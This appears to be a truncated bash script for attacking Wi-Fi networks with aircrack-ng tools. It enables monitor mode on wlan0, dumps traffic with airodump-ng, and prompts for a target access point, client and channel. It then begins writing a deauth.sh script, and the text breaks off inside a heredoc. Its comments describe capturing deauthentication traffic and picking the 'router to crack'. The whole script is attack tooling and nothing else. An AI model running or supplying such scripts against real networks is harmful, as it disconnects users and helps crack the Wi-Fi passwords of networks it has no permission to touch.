#!/bin/bash # start in monitor mode airmon-ng start wlan0 # dump all traffic data airodump-ng wlan0mon # start capturing packets, looking for deauth # -c channel of AP # --bssid router to crack i.e., AP echo "Enter AP: "; read AP echo "Enter Client: "; read CL echo "Enter channel: "; read CH cat > deauth.sh <